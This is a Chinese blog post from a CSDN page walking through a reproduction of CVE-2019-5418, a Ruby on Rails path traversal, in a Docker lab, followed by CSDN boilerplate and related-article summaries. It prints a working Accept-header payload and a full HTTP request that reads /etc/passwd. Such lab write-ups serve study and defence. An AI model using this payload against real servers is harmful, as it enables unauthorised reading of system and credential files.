CVE-2019-5418 Ruby on Rails 路径穿越与任意文件读取漏洞

最新推荐文章于 2023-11-14 20:11:37 发布
最新推荐文章于 2023-11-14 20:11:37 发布
阅读量336 收藏
点赞数
分类专栏: 漏洞 文章标签: ruby on rails 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121944931
版权

漏洞简介

在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入Accept: ../../../../../../../../etc/passwd{{头来构成构造路径穿越漏洞,读取任意文件。

环境搭建

执行如下命令编译及启动Rail On Rails 5.2.2:

在这里插入图片描述

docker-compose build
docker-compose up -d

环境启动后,访问http://your-ip:3000即可看到Ruby on Rails的欢迎页面。
可以看到端口
在这里插入图片描述

漏洞复现

访问http://127.0.0.1:3000/robots/可见,正常的robots.txt文件被读取出来。

在这里插入图片描述
一定要抓到robots的数据包
在这里插入图片描述将Accept数据修改为一下

../../../../../../../../etc/passwd{{

利用漏洞,发送如下数据包,读取/etc/passwd

GET /robots/ HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: ../../../../../../../../etc/passwd{{
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

成功读取:

GuiltyFet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2019-5418Ruby on Rails路径穿越任意文件读取漏洞
weixin_45620609的博客
08-05 1697
CVE-2019-5418Ruby on Rails路径穿越任意文件读取漏洞复现1.原理2.环境搭建3.漏洞复现4.漏洞修复 1.原理 Ruby on Rails(或者简称 Rails)是一个 Web 开发框架,使用 Ruby 编程语言开发。而2018主要是由于rails使用Sprockets作为静态文件服务器,在 Sprockets 3.7.1及之前版本中存在一个两次解码的路径穿越漏洞。而2019则主要是由于使用了为指定参数的render file来渲染应用之外的视图,修改访问某控制器的请求包,通过“
漏洞复现】Ruby on Rails 路径穿越任意文件读取漏洞CVE-2019-5418
zg_111的博客
03-27 2001
漏洞复现】Ruby on Rails 路径穿越任意文件读取漏洞CVE-2019-5418
CVE-2019-5418
Foreverlove112的博客
10-01 279
CVE-2019-5418
Ruby On Rails漏洞复现第二题(CVE-2019-5418) --目录穿越
小白鸽
07-31 522
01 背景介绍 Ruby On Rails是一个著名的Ruby Web开发框架,它在开发环境中使用Sprockets作为静态文件服务器。Sprockets是一个Ruby库,用于编译和分发静态资源文件。 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞读取任意文件。 ({{闭合模板路径) 02 影响版本 Rails全版本 其中修复版本
Cve2019-5418复现
Ping_Pig的博客
11-19 637
Vulhub环境: 启动目录/rails/CVE-2019-5418,启动命令:docker-compose up -d 随后访问http://you ip:3000 出现欢迎界面,然后访问/robots目录 Burp抓取该目录的数据包,修改accept为如下payload: ../../../../../../etc/passwd Msf的use auxiliary/gather/r...
CVE-2019-5418CVE-2019-5418-Ruby on Rails上的文件内容披露
02-05
CVE-2019-5418是一个文件内容披露漏洞,存在于Ruby on Rails 5.0.x、5.1.x和5.2.x版本中。主要原因是Rails的ActionDispatch组件在处理某些URL时,未能正确验证和限制文件路径的访问。攻击者可以通过构造特殊的URL...
Rails-doubletap-RCE:使用路径遍历(CVE-2019-5418)和Ruby对象反序列化(CVE-2019-5420)的Rails 5.2.2上的RCE
02-06
使用路径遍历(CVE-2019-5418)和Ruby对象反序列化的RCE on Rails 5.2.2(CVE-2019-5420) 技术分析: CVE-2019-5418- CVE-2019-5420- //hackerone.com/reports/473888 安全部门: CVE-2019-5418- //groups....
CVE-2019-11708:针对Windows 64位版本的Firefox的完整漏洞利用链(CVE-2019-11708和CVE-2019-9810)
02-04
CVE-2019-11708和CVE-2019-9810的全链漏洞利用 这是针对Windows 64位Firefox的完整的浏览器入侵漏洞利用链(CVE-2019-11708和CVE-2019-9810)。 它使用CVE-2019-9810在内容流程以及父流程中获取代码执行,并使用CVE-...
vulfocus复现:Rails 文件读取CVE-2019-5418
m0_71518346的博客
12-17 209
描述(来自vulfocus):Ruby on Rails 是一个用于开发数据库驱动的网络应用程序的完整框架。
【墨者学院】Ruby On Rails 漏洞复现(CVE-2019-5418
hehigoxqc606的博客
08-31 359
【墨者学院】Ruby On Rails 漏洞复现(CVE-2019-5418漏洞原理:通过”chybete”路径或者访问“robots”路径这两个入口配合路径穿越任意文件读取,可以读取任意文件,利用手法:通过“../../../../”来达到路径穿越的目的。然后再通过“{{”来进行模板查询路径的闭合。 闭合的目的是为了可以正常的解析 关于在测试过程中如何知道该测试框架是否为Ruby On Rails框架,关键是在一开始信息收集这步骤 第一步:访问靶场链接,得到如下页面 ...
Ruby on Rails任意文件读取漏洞复现 - CVE-2019-5418
三天不打上房揭瓦的博客
12-21 478
前言:前言:小编也是现学现卖,方便自己记忆,写的不好的地方多多包涵,希望各位大佬多多批评指正。 目录简介漏洞概述影响版本环境搭建和漏洞利用漏洞修复 简介 Ruby on Rails 是一个可以使你开发、部署、维护 web 应用程序变得简单的框架。 漏洞概述 这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,我们可以通过修改访问某控制器的请求包,通过“…/…/…/…/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使得所要访问的文件被当
[文件读取]rails 任意文件读取CVE-2019-5418
最新发布
wj33333的博客
11-14 60
通过传入Accept: ../../../../../../../../etc/passwd{{1.访问/chybeta目录抓包。网站后台地址:/chybeta。查看/tmp/flag。
学习总结之任意文件读取漏洞(网站敏感数据泄露)
weixin_63694057的博客
06-17 1773
以下内容是我在实践过程中找到的一个任意文件读取漏洞,通过DirBuster发现该域名下存在.zip文件,通过在域名路径下加上该文件即可将这个压缩包下载到我的本地,然后解压发现是该网站的源码,这个漏洞对该企业网站来说影响是很大的,我也提交了该漏洞。原理:攻击者使用各种攻击方式扫描目标网站,寻找未授权访问的漏洞,然后攻击者利用这些漏洞发送特殊请求,获取到网站上存在的敏感信息或者文件;还有phpinfo文件,能够获取到服务器真实IP,一些配置信息如中间件,系统版本,数据库版本等,以及获取到网站根目录。
CVE-2019-5418Ruby
战神/calmness的博客
11-21 329
*CVE-2019-5418Ruby on Rails路径穿越任意文件读取复现 你剥开一个很酸的橙子而感到后悔了,可对于橙子来说,那是它的一切. 漏洞概述: 这个漏洞主要是由于Ruby on Rails使用了指定参数的render file来渲染应用之外的视图,我们可以通过修改访问某控制器的请求包,通过“…/…/…/…/”来达到路径穿越的目的,然后再通过“{{”来进行模板查询路径的闭合,使...
中间件漏洞 | Apache-路径穿越/任意命令执行
weixin_52116519的博客
11-02 1379
Apache HTTP Server 2.4.49 路径穿越漏洞Apache HTTP Server是Apache基金会开源的一款流行的HTTP服务器。在其2.4.49版本版本等于2.4.49穿越的目录允许被访问,比如配置了。(默认情况下是不允许的)攻击者利用这个漏洞,可以读取位于Apache服务器Web目录以外的其他文件,或者读取Web目录中的脚本文件源码,或者在开启了cgi或cgid的服务器上执行任意命令。
Ruby on Rails 路径穿越任意文件读取漏洞CVE-2019-5418
黑白的博客
12-14 341
声明 好好学习,天天向上 漏洞描述 在控制器中通过render file形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。 通过传入Accept: …/…/…/…/…/…/…/…/etc/passwd{{ 头来构成构造路径穿越漏洞读取任意文件。 影响范围 Rails全版本 其中修复版本 6.0.0.beta3, 5.2.2.1 5.1.6.2 5.0.7.2 4.2.11.1 复现过程 这里使用2.5.4版本 使用vulhub cd /app/vulhub-master/rai
Ruby on Rails路径穿越任意文件读取复现 --CVE-2019-5418
thelostworld
11-10 302
Ruby on Rails路径穿越任意文件读取复现 CVE-2019-5418编写者:thelostworld_fv简介:Ruby on Rails是一个 Web 应用程序框架,是一个相对较新的 Web 应用程序框架,构建在 Ruby 语言之上。它被宣传为现有企业框架的一个替代,而它的目标,就是让 Web 开发方面的生活,变得更轻松。漏洞描述:这个漏洞主要是由于Ruby on Rails使用了指...
Jackson 最新反序列化漏洞(CVE-2019-14361和CVE-2019-144391
07-14
你提到的 Jackson 最新反序列化漏洞CVE-2019-14361 和 CVE-2019-14439。这些漏洞都是与 Jackson 库中的反序列化功能相关的安全问题。 CVE-2019-14361 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.9.x 版本。 CVE-2019-14439 是一个远程代码执行漏洞,攻击者可以通过构造恶意的序列化数据来执行任意代码。该漏洞主要影响 Jackson-databind 库的 2.6.x 至 2.9.x 版本。 为了解决这些漏洞,建议开发人员尽快升级到最新版本的 Jackson-databind 库。另外,还可以考虑限制反序列化操作的使用,以减少潜在的风险。记住及时关注安全公告,并采取相应的措施来保护应用程序免受可能的攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值